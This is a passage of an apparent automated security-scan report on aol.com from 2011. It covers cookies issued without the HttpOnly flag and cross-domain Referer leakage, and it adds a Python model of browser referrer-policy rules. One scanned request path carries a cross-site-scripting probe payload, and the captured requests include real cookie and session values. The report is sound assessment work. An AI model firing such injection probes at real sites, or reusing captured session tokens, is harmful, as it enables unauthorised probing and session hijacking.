Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:38 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-50.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2520
Set-Cookie: JSESSIONID=A3952DF32658E1DB2F8B42FB462C9CBB; Path=/aol
Content-Length: 2520

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl3 plid-87592 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...

5.3. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (Path=/aol). It is issued even on this 404 response. The name indicates a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254) HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 18 Aug 2011 23:26:23 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-107-99.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=2E211D57875F8FCD299BAF70F0E8D34E; Path=/aol
Connection: close
Content-Length: 16617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

5.4. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (Path=/aol). The name indicates a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-38.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=AB6892FB05BD4073E3A16F7705718005; Path=/aol
Content-Length: 40895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...

5.5. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (Path=/aol). The name indicates a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp?m=dailyvj&p=videoconfig HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:23 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-72.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: JSESSIONID=26F2058D44B9A19F05B6636E05EE5CF7; Path=/aol
Content-Length: 13787

<div id="videoShowUrls" class="dn">
You've Got:pair:http://video.aol.com/show/youve-got:show:AOL Daybreak:pair:http://video.aol.com/show/aol-daybreak:show:The Urlesque Show:pair:http://video.aol.c
...[SNIP]...

6. Cross-domain Referer leakage
There are 29 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations (proxy and server logs, browser history) and may be visible on-screen to untrusted parties. A Referrer-Policy response header (or <meta name="referrer">) can additionally trim cross-origin referrers to the origin alone, but that is a browser-side courtesy, not a substitute for keeping secrets out of URLs.
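What actually reaches a third-party domain in the Referer header, as an added example that is not part of the report. The function implements the browser referrer-policy rules for the common policy values (the 2011-era default `no-referrer-when-downgrade` and today's default `strict-origin-when-cross-origin`), stripping the fragment and userinfo as browsers do; the originating URL is the one from finding 6.1 below and the targets are links from that page.

```python
from urllib.parse import urlsplit, urlunsplit, parse_qs

# Originating URL from finding 6.1 (query string as captured).
SRC = 'http://www.aol.com/?icid=aolcomlogorefresh5&dlact=dl1'

DEFAULT_PORTS = {'http': 80, 'https': 443}


def origin_of(url: str) -> str:
    """scheme://host[:port], with the scheme's default port dropped."""
    u = urlsplit(url)
    host = (u.hostname or '').lower()
    if u.port is not None and u.port != DEFAULT_PORTS.get(u.scheme.lower()):
        host = '%s:%d' % (host, u.port)
    return '%s://%s' % (u.scheme.lower(), host)


def strip_for_referer(url: str) -> str:
    """The most a browser will ever send: scheme, host, port, path and
    query; never the fragment or userinfo."""
    u = urlsplit(url)
    host_port = origin_of(url).split('://', 1)[1]
    return urlunsplit((u.scheme.lower(), host_port, u.path or '/', u.query, ''))


def referer_for(source_url: str, target_url: str,
                policy: str = 'no-referrer-when-downgrade'):
    """Referer value the browser sends when a page at source_url requests
    target_url under the given Referrer-Policy, or None if it sends none."""
    same_origin = origin_of(source_url) == origin_of(target_url)
    downgrade = (urlsplit(source_url).scheme.lower() == 'https'
                 and urlsplit(target_url).scheme.lower() == 'http')
    full = strip_for_referer(source_url)
    origin_only = origin_of(source_url) + '/'
    if policy == 'no-referrer':
        return None
    if policy == 'no-referrer-when-downgrade':
        return None if downgrade else full
    if policy == 'same-origin':
        return full if same_origin else None
    if policy == 'origin':
        return origin_only
    if policy == 'strict-origin':
        return None if downgrade else origin_only
    if policy == 'origin-when-cross-origin':
        return full if same_origin else origin_only
    if policy == 'strict-origin-when-cross-origin':
        if same_origin:
            return full
        return None if downgrade else origin_only
    if policy == 'unsafe-url':
        return full
    raise ValueError('unknown policy: ' + policy)


def leaked_params(source_url: str, target_url: str,
                  policy: str = 'no-referrer-when-downgrade') -> set:
    """Names of the query parameters that reach target_url via Referer."""
    ref = referer_for(source_url, target_url, policy)
    if ref is None:
        return set()
    return set(parse_qs(urlsplit(ref).query).keys())


if __name__ == '__main__':
    for target in ('http://www.huffingtonpost.com/', 'https://about.me/',
                   'http://www.aol.com/video/x/'):
        for pol in ('no-referrer-when-downgrade', 'strict-origin-when-cross-origin'):
            print('%-34s %-32s %s' % (target, pol, referer_for(SRC, target, pol)))
```

For this page the leaked parameters are `icid` and `dlact`, neither of which is a secret, which is why the scanner rates the instance Information; the same function applied to a URL that carried a session identifier would show that identifier reaching every cross-origin link, image and script host under the legacy default policy.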


6.1. http://www.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string (icid=aolcomlogorefresh5&dlact=dl1, the header-logo refresh link shown in the response below). Neither parameter is a secret: icid is a click-tracking id and dlact apparently selects the "dynamic lead" slot, so this instance is informational. The response contains the following links to other domains, each of which would receive that URL in the Referer header under the browser's default policy:

Request

GET /?icid=aolcomlogorefresh5&dlact=dl1 HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:19:29 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-98.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=CD614CEF689D786D18461C3A6507E175; Path=/aol
Content-Length: 81452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
</iframe>
<link rel="stylesheet" type="text/css" href="http://portal.aolcdn.com/p5/_v58.6/css/maing.css" />
<script type="text/javascript">
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" class="skin_link" href="http://portal.aolcdn.com/p5/skin/_v8/fuzzy.css" />
<style>
...[SNIP]...
<body class="fuzzy">
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/os/omniture/prod/omniunih_portal_min.js"></script>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327" class="lnid-sec1_lnk1" name="om_weathericon"><img class="wthr_avatar" alt="Dallas, TX: Mostly Clear" title="Dallas, TX: Mostly Clear" src="http://portal.aolcdn.com/p5/_v58.6/css/w/w33.png"/></a>
...[SNIP]...
<a id="aol-header-logo" title="Click here to refresh" name="om_hdrlogo" class="lnid-sec1_lnk1 " href="?icid=aolcomlogorefresh5&dlact=dl1"><img alt="Click here to refresh" src="http://portal.aolcdn.com/p5/forms/326/7116f573-7cda-4e8f-b2ec-b0d272075b69.png"/></a>
...[SNIP]...
<a href="http://mail.aol.com/" class="qnpos1 qn auth-0 show-500 hide-300 thresh-500 plid-47438 lnid-sec1_lnk1" name="om_quicknav_mail_flatstyle" title='AOL Mail' id='mailpreview'><img alt="" class="noion" src="http://portal.aolcdn.com/p5/forms/603/de739a04-4d4d-471b-be3d-5732e5db1aff.png"/><span>
...[SNIP]...
</div><a href="http://www.aim.com/products/express/" class="qnpos2 plid-51753 lnid-sec1_lnk2" name="om_quicknav_aim_flatstyle" title='AIM' id='aimexpress'><img alt="" class="noion" src="http://portal.aolcdn.com/p5/forms/603/de739a04-4d4d-471b-be3d-5732e5db1aff.png"/></a>
...[SNIP]...
tp://video.aol.com/" target="_blank" class="qnpos7 plid-84662 lnid-sec1_lnk7" name="om_quicknav_quick-nav-video_flatstyle" title='Get millions of video from AOL , AOL partners and third party videos'><img alt="" class="noion" src="http://portal.aolcdn.com/p5/forms/603/de739a04-4d4d-471b-be3d-5732e5db1aff.png"/></a>
...[SNIP]...
<li><a title="News" name="om_hnav_sec1_link1" class="icid-navbar_rootnews lnid-sec1_lnk2" href="http://www.huffingtonpost.com/"><b>
...[SNIP]...
<div class='hnav_header'><a title="News" name="om_hnav_sec1_link1" class="icid-navbar_rootnews lnid-sec1_lnk2" href="http://www.huffingtonpost.com/"><b>
...[SNIP]...
<td class='underline_cell'><a title="Breaking News and Opinion on The Huffington Post" name="om_hnav_sec1_link3" class="icid-navbar_huffpo lnid-sec1_lnk3" href="http://www.huffingtonpost.com/">Huffington Post</a>
...[SNIP]...
<td class='underline_cell'><a title="Politics News and Opinion on The Huffington Post" name="om_hnav_sec1_link4" class="icid-navbar_politics lnid-sec1_lnk4" href="http://www.huffingtonpost.com/politics">Politics</a>
...[SNIP]...
<td class='underline_cell'><a title="Pro and college sports news, stats, scores and player updates from SportingNews" name="om_hnav_sec1_link5" class="icid-navbar_sports lnid-sec1_lnk5" href="http://aol.sportingnews.com">Sports</a>
...[SNIP]...
<td><a title="World News and Opinion on The Huffington Post" name="om_hnav_sec1_link7" class="icid-navbar_world lnid-sec1_lnk7" href="http://www.huffingtonpost.com/world">World</a>
...[SNIP]...
<li><a title="Entertainment" name="om_hnav_sec2_link1" class="icid-navbar_rootentertainment lnid-sec2_lnk2" href="http://www.huffingtonpost.com/entertainment/"><b>
...[SNIP]...
<div class='hnav_header'><a title="Entertainment" name="om_hnav_sec2_link1" class="icid-navbar_rootentertainment lnid-sec2_lnk2" href="http://www.huffingtonpost.com/entertainment/"><b>
...[SNIP]...
<td class='underline_cell'><a title="Celebrity news and photos and top music, movie and TV news" name="om_hnav_sec2_link3" class="icid-navbar_entnews lnid-sec2_lnk3" href="http://www.huffingtonpost.com/celebrity/">Celebrity News</a>
...[SNIP]...
<td class='underline_cell'><a title="Comedy News and Opinion on the Huffington Post" name="om_hnav_sec2_link4" class="icid-navbar_comedy lnid-sec2_lnk4" href="http://www.huffingtonpost.com/comedy">Comedy</a>
...[SNIP]...
<td class='underline_cell'><a title="Play hundreds of free online games from Games.com" name="om_hnav_sec2_link5" class="icid-navbar_games lnid-sec2_lnk5" href="http://www.games.com">Games</a>
...[SNIP]...
<td class='underline_cell'><a title="Movie news, show times, tickets, trailers and more from Moviefone" name="om_hnav_sec2_link6" class="icid-navbar_movies lnid-sec2_lnk6" href="http://www.moviefone.com">Movies</a>
...[SNIP]...
<li><a title="Finance" name="om_hnav_sec3_link1" class="icid-navbar_rootfinance lnid-sec3_lnk2" href="http://www.dailyfinance.com"><b>
...[SNIP]...
<div class='hnav_header'><a title="Finance" name="om_hnav_sec3_link1" class="icid-navbar_rootfinance lnid-sec3_lnk2" href="http://www.dailyfinance.com"><b>
...[SNIP]...
<td class='underline_cell'><a title="Business News and Opinion on The Huffington Post" name="om_hnav_sec3_link3" class="icid-navbar_business lnid-sec3_lnk3" href="http://www.huffingtonpost.com/business">Business News</a>
...[SNIP]...
<td class='underline_cell'><a title="Business news, stock quotes and investment advice" name="om_hnav_sec3_link4" class="icid-navbar_Finance lnid-sec3_lnk4" href="http://www.dailyfinance.com">DailyFinance</a>
...[SNIP]...
<td class='underline_cell'><a title="Your quotes, news and summary from DailyFinance" name="om_hnav_sec3_link6" class="icid-navbar_myportfolios lnid-sec3_lnk6" href="http://www.dailyfinance.com/portfolios/myportfolios">My Portfolios</a>
...[SNIP]...
<td><a title="Small business news from the Huffington Post" name="om_hnav_sec3_link8" class="icid-navbar_smallbus lnid-sec3_lnk8" href="http://www.huffingtonpost.com/news/small-business-america/">Small Business</a>
...[SNIP]...
<li><a title="Tech" name="om_hnav_sec4_link1" class="icid-navbar_roottech lnid-sec4_lnk2" href="http://techcrunch.com"><b>
...[SNIP]...
<div class='hnav_header'><a title="Tech" name="om_hnav_sec4_link1" class="icid-navbar_roottech lnid-sec4_lnk2" href="http://techcrunch.com"><b>
...[SNIP]...
<td class='underline_cell'><a title="Coverage of everything new in gadgets and consumer electronics" name="om_hnav_sec4_link3" class="icid-navbar_engadget lnid-sec4_lnk3" href="http://www.engadget.com/">Engadget</a>
...[SNIP]...
<td class='underline_cell'><a title="The definitive source for news and information on the video game industry" name="om_hnav_sec4_link4" class="icid-navbar_joystiq lnid-sec4_lnk4" href="http://www.joystiq.com/">Joystiq</a>
...[SNIP]...
<td class='underline_cell'><a title="Your source for Apple news, tips, reviews and how-tos" name="om_hnav_sec4_link5" class="icid-navbar_tuaw lnid-sec4_lnk5" href="http://www.tuaw.com/">TUAW</a>
...[SNIP]...
<td><a title="A blog about technology news and analysis, as well as profiling of startup companies, products and websites" name="om_hnav_sec4_link6" class="icid-navbar_techcrunch lnid-sec4_lnk6" href="http://techcrunch.com/">TechCrunch</a>
...[SNIP]...
<li><a title="Style" name="om_hnav_sec5_link1" class="icid-navbar_rootstyle lnid-sec5_lnk2" href="http://www.huffingtonpost.com/style"><b>
...[SNIP]...
<div class='hnav_header'><a title="Style" name="om_hnav_sec5_link1" class="icid-navbar_rootstyle lnid-sec5_lnk2" href="http://www.huffingtonpost.com/style"><b>
...[SNIP]...
<td class='underline_cell'><a title="African American news, culture and community" name="om_hnav_sec5_link3" class="icid-navbar_bv lnid-sec5_lnk3" href="http://www.blackvoices.com/">Black Voices</a>
...[SNIP]...
<td class='underline_cell'><a title="Parenting advice, news, deals and more from ParentDish" name="om_hnav_sec5_link4" class="icid-navbar_parent lnid-sec5_lnk4" href="http://www.huffingtonpost.com/parents/">Family</a>
...[SNIP]...
<td class='underline_cell'><a title="Recipes, Cooking Tips, Food Advice and Menus" name="om_hnav_sec5_link5" class="icid-navbar_food lnid-sec5_lnk5" href="http://www.kitchendaily.com">Food</a>
...[SNIP]...
<td class='underline_cell'><a title="Health information, news, diet and fitness tips, tools and more" name="om_hnav_sec5_link6" class="icid-navbar_health lnid-sec5_lnk6" href="http://www.everydayhealth.com/aol">Health</a>
...[SNIP]...
<td class='underline_cell'><a title="Daily, weekly and monthly forecasts, astrology, tarot and numerology" name="om_hnav_sec5_link8" class="icid-navbar_horo lnid-sec5_lnk8" href="http://horoscopes.mydaily.com">Horoscopes</a>
...[SNIP]...
<td class='underline_cell'><a title="Latin American news, photos, AIM and free e-mail in Spanish" name="om_hnav_sec5_link9" class="icid-navbar_latino lnid-sec5_lnk9" href="http://www.aollatino.com/">Latino</a>
...[SNIP]...
<td class='underline_cell'><a title="Fashion trends, product reviews, beauty tips and more from StyleList" name="om_hnav_sec5_link10" class="icid-navbar_style lnid-sec5_lnk10" href="http://www.stylelist.com">StyleList</a>
...[SNIP]...
<td><a title="Healthy Living News and Opinion" name="om_hnav_sec5_link12" class="icid-navbar_wellness lnid-sec5_lnk12" href="http://www.huffingtonpost.com/healthy-living">Wellness</a>
...[SNIP]...
<td class='underline_cell'><a title="Offering free, online coupon codes and cash back savings for online discounts" name="om_hnav_sec6_link3" class="icid-navbar_coupons lnid-sec6_lnk3" href="http://shortcuts.com/">Coupons</a>
...[SNIP]...
<td class='underline_cell'><a title="Lets you quickly build simple and visually elegant splash pages that point visitors to your content from around the web." name="om_hnav_sec7_link4" class="icid-navbar_aboutme lnid-sec7_lnk4" href="https://about.me/">About.Me</a>
...[SNIP]...
<li><a title="Play hundreds of free online games from Games.com" name="om_hnav_sec8_link1" class="icid-navbar_rootgames lnid-sec8_lnk1" href="http://www.games.com"><b>
...[SNIP]...
<li><a title="Get maps, driving directions, gas prices, local information and more" name="om_hnav_sec10_link1" class="icid-navbar_rootmapquest lnid-sec10_lnk1" href="http://www.mapquest.com/"><b>
...[SNIP]...
<li><a title="Your source for local knowledge" name="om_hnav_sec11_link1" class="icid-navbar_rootpatch lnid-sec11_lnk1" href="http://www.patch.com"><b>
...[SNIP]...
<li><a title="Free online radio offering 350+ sports, news, talk and music stations" name="om_hnav_sec12_link1" target="_blank" class="icid-navbar_rootradio lnid-sec12_lnk1" href="http://player.radio.com/player/AOLPlayer.php?version=1.2.11740&amp;station=+StationID+oString"><b>
...[SNIP]...
</span>
<a id="dlimg" name="om_dl1_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl1|sec1_lnk1|87589" href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html"><img height="217" alt="Norway Attacks" width="386" src="http://i.huffpost.com/gen/332778/thumbs/a-NORWAY-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl1_hdln" href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl1|sec1_lnk2|87589">New Details in Norway Massacre
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl1_cpy" href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl1|sec1_lnk3|87589">Who he dialed (& hung up on) twice
</a>
...[SNIP]...
<li ><a name="om_dl1_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl1|sec3_lnk1|87589" href="http://www.foxnews.com/world/2011/08/18/israel-radio-says-second-bus-attacked-by-gunfire/">Israel Attacked by 'Terror Squad'</a>
...[SNIP]...
<li ><a name="om_dl1_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl1|sec3_lnk2|87589" href="http://www.huffingtonpost.com/2011/08/18/texas-drought-2011-town_n_930308.html">US City May Run Out of Water</a>
...[SNIP]...
<li ><a name="om_dl1_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl1|sec3_lnk3|87589" href="http://www.huffingtonpost.com/2011/08/18/jon-stewart-rips-ed-schultz_n_930618.html">Jon Stewart Rips Into Ed Schultz</a>
...[SNIP]...
<h2 id="om_news_more-news_title"><a class="lnid-sec1_lnk1" href="http://www.huffingtonpost.com/">Latest Headlines</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/wall-street-sell-off_n_930510.html" class="lnid-sec2_lnk1">Stocks Plunge As More Signs Of Economic Weakness Emerge</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/officials-change-deportation-policy_n_930688.html" class="lnid-sec2_lnk2">Officials Change Deportation Policy</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/bahrain-protesters-clash-_n_930877.html" class="lnid-sec2_lnk3">Bahrain Protesters Clash With Security Forces</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/aig-bailout_n_930867.html" class="lnid-sec2_lnk4">AIG Repays $2.15 Billion Of Its Bailout Money</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/2-men-plead-guilty-in-swa_n_930827.html" class="lnid-sec2_lnk5">Two Plead Guilty For Branding Swastika On Navajo Man</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/mohammad-younis-man-linke_n_930844.html" class="lnid-sec2_lnk6">Man Linked To Times Square Bomber Pleads Guilty</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/afghanistan-roadside-bomb_n_930780.html" class="lnid-sec2_lnk7">Roadside Bomb Kills 12 Children In Afghanistan</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/elizabeth-warren-exploratory-committee_n_930530.html" class="lnid-sec2_lnk8">Elizabeth Warren Takes Next Step Toward Possible Senate Run</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html" class="lnid-sec2_lnk9">Norway Killer Called Authorities Twice During Shooting, Police Say</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/los-angeles-downgraded-by_n_930296.html" class="lnid-sec2_lnk10">Los Angeles Downgraded By Standard & Poor's</a>
...[SNIP]...
</ul><a name="om_news_more-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.huffingtonpost.com">More News</a>
...[SNIP]...
<h2><a name="om_marketquotes_title" href="http://www.dailyfinance.com/market-news/" class=" lnid-sec1_lnk1">Market Quotes</a>
...[SNIP]...
<span class="sprite down"><img class="noion" src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="down"></span>
...[SNIP]...
<td class="ticker-name"><a name="om_marketquotes_quote1" href="http://www.dailyfinance.com/quotes/dow-jones-industrial-average/%24indu/dji">

DJIA
</a>
...[SNIP]...
<span class="sprite down"><img class="noion" src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="down"></span>
...[SNIP]...
<td class="ticker-name"><a name="om_marketquotes_quote2" href="http://www.dailyfinance.com/quotes/nasdaq-composite/%24compx/nai">

NASDAQ
</a>
...[SNIP]...
<span class="sprite down"><img class="noion" src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="down"></span>
...[SNIP]...
<td class="ticker-name"><a name="om_marketquotes_quote3" href="http://www.dailyfinance.com/quotes/sandp-500-index-rth/%24inx/cmi">

S&P 500
</a>
...[SNIP]...
<div class="markets-footer">
<a name="om_marketquotes_link1" class="lnid-sec2_lnk1 first" href="http://www.dailyfinance.com/portfolios/myportfolios">My Portfolios</a><a name="om_marketquotes_link2" class="lnid-sec2_lnk2" href="http://www.dailyfinance.com/market-news/">Markets</a><a name="om_marketquotes_link3" class="lnid-sec2_lnk3 last" href="http://www.dailyfinance.com/">Finance News</a>
...[SNIP]...
<h2 id="om_news_business-news_title"><a class="lnid-sec1_lnk1" href="http://www.dailyfinance.com/">Business News</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk1" href="http://www.dailyfinance.com/market-news/">More Signs of Economic Weakness Spark Major Selloff</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk2" href="http://www.dailyfinance.com/2011/08/18/are-you-photoshopping-your-finances/">Are Your Photoshopping Your Finances?</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk3" href="http://www.dailyfinance.com/2011/08/17/u-s-credit-card-debt-declines/">How to Dig Yourself Out of Credit Card Debt</a>
...[SNIP]...
